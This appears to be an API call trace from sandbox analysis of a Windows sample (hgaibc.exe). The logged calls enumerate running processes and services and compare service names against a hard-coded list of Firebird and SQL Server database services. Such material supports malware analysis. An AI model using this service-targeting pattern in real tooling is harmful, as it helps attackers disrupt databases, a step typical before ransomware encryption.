[0158.395] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0158.395] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0158.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0158.395] lstrlenW (lpString="RpcEptMapper") returned 12 [0158.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0158.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0158.396] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0158.396] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0158.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0158.396] lstrlenW (lpString="RpcSs") returned 5 [0158.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0158.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0158.396] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0158.396] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0158.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0158.396] lstrlenW (lpString="SamSs") returned 5 [0158.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0158.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0158.396] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0158.396] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0158.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0158.396] lstrlenW (lpString="Schedule") returned 8 [0158.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0158.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0158.396] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0158.396] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0158.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0158.396] lstrlenW (lpString="SecurityHealthService") returned 21 [0158.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0158.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0158.396] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0158.397] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0158.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0158.397] lstrlenW (lpString="SENS") returned 4 [0158.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0158.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0158.397] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0158.397] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0158.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0158.397] lstrlenW (lpString="ShellHWDetection") returned 16 [0158.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0158.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0158.397] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0158.397] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0158.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0158.397] lstrlenW (lpString="Spooler") returned 7 [0158.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0158.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0158.397] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0158.397] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0158.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0158.397] lstrlenW (lpString="StateRepository") returned 15 [0158.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0158.475] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0158.475] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0158.476] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0158.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0158.476] lstrlenW (lpString="SysMain") returned 7 [0158.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0158.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0158.476] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0158.476] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0158.476] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0158.476] lstrlenW (lpString="SystemEventsBroker") returned 18 [0158.476] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0158.476] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0158.476] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0158.477] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0158.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0158.477] lstrlenW (lpString="Themes") returned 6 [0158.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0158.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0158.477] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0158.477] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0158.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0158.477] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0158.477] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0158.477] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0158.477] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0158.477] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0158.477] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0158.477] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0158.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0158.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0158.488] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0158.488] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0158.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4595fc8 | out: hHeap=0x6a0000) returned 1 [0158.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x43c [0158.551] Process32FirstW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.552] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0158.553] lstrlenW (lpString="System") returned 6 [0158.553] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0158.554] lstrlenW (lpString="smss.exe") returned 8 [0158.554] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.555] lstrlenW (lpString="csrss.exe") returned 9 [0158.555] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0158.556] lstrlenW (lpString="wininit.exe") returned 11 [0158.556] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0158.557] lstrlenW (lpString="csrss.exe") returned 9 [0158.557] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0158.558] lstrlenW (lpString="winlogon.exe") returned 12 [0158.558] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0158.558] lstrlenW (lpString="services.exe") returned 12 [0158.559] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0158.559] lstrlenW (lpString="lsass.exe") returned 9 [0158.559] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0158.560] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0158.560] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0158.561] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0158.561] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.562] lstrlenW (lpString="svchost.exe") returned 11 [0158.562] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.563] lstrlenW (lpString="svchost.exe") returned 11 [0158.563] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0158.564] lstrlenW (lpString="dwm.exe") returned 7 [0158.564] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.565] lstrlenW (lpString="svchost.exe") returned 11 [0158.565] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.566] lstrlenW (lpString="svchost.exe") returned 11 [0158.566] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.567] lstrlenW (lpString="svchost.exe") returned 11 [0158.567] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.568] lstrlenW (lpString="svchost.exe") returned 11 [0158.568] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.569] lstrlenW (lpString="svchost.exe") returned 11 [0158.569] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.570] lstrlenW (lpString="svchost.exe") returned 11 [0158.570] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.571] lstrlenW (lpString="svchost.exe") returned 11 [0158.571] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.571] lstrlenW (lpString="svchost.exe") returned 11 [0158.572] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.572] lstrlenW (lpString="svchost.exe") returned 11 [0158.572] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.573] lstrlenW (lpString="svchost.exe") returned 11 [0158.573] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0158.574] lstrlenW (lpString="spoolsv.exe") returned 11 [0158.574] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.575] lstrlenW (lpString="svchost.exe") returned 11 [0158.575] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0158.576] lstrlenW (lpString="audiodg.exe") returned 11 [0158.576] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0158.577] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0158.577] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0158.577] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0158.577] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0158.578] lstrlenW (lpString="Memory Compression") returned 18 [0158.578] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0158.579] lstrlenW (lpString="sihost.exe") returned 10 [0158.579] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0158.580] lstrlenW (lpString="svchost.exe") returned 11 [0158.580] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0158.581] lstrlenW (lpString="msoia.exe") returned 9 [0158.581] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0158.582] lstrlenW (lpString="taskhostw.exe") returned 13 [0158.582] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0158.582] lstrlenW (lpString="explorer.exe") returned 12 [0158.583] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0158.583] lstrlenW (lpString="SearchUI.exe") returned 12 [0158.583] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0158.584] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0158.584] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0158.697] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0158.698] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0158.735] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0158.735] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0158.790] lstrlenW (lpString="hgaibc.exe") returned 10 [0158.790] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0158.791] lstrlenW (lpString="cmd.exe") returned 7 [0158.792] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0158.793] lstrlenW (lpString="conhost.exe") returned 11 [0158.793] Process32NextW (in: hSnapshot=0x43c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0158.794] CloseHandle (hObject=0x43c) returned 1 [0158.794] Sleep (dwMilliseconds=0x1f4) [0159.404] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c470 [0159.445] EnumServicesStatusExW (in: hSCManager=0x458c470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0159.447] GetLastError () returned 0xea [0159.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1bc4) returned 0x4579f08 [0159.447] EnumServicesStatusExW (in: hSCManager=0x458c470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4579f08, cbBufSize=0x1bc4, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4579f08, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0159.448] CloseServiceHandle (hSCObject=0x458c470) returned 1 [0159.448] lstrlenW (lpString="AppXSvc") returned 7 [0159.448] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0159.448] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0159.448] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0159.448] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0159.448] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0159.449] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0159.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0159.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0159.449] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0159.449] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0159.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0159.449] lstrlenW (lpString="Audiosrv") returned 8 [0159.449] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0159.449] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0159.449] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0159.449] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0159.449] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0159.450] lstrlenW (lpString="BFE") returned 3 [0159.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0159.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0159.450] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0159.450] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0159.450] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0159.450] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0159.450] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0159.450] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0159.450] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0159.450] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0159.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 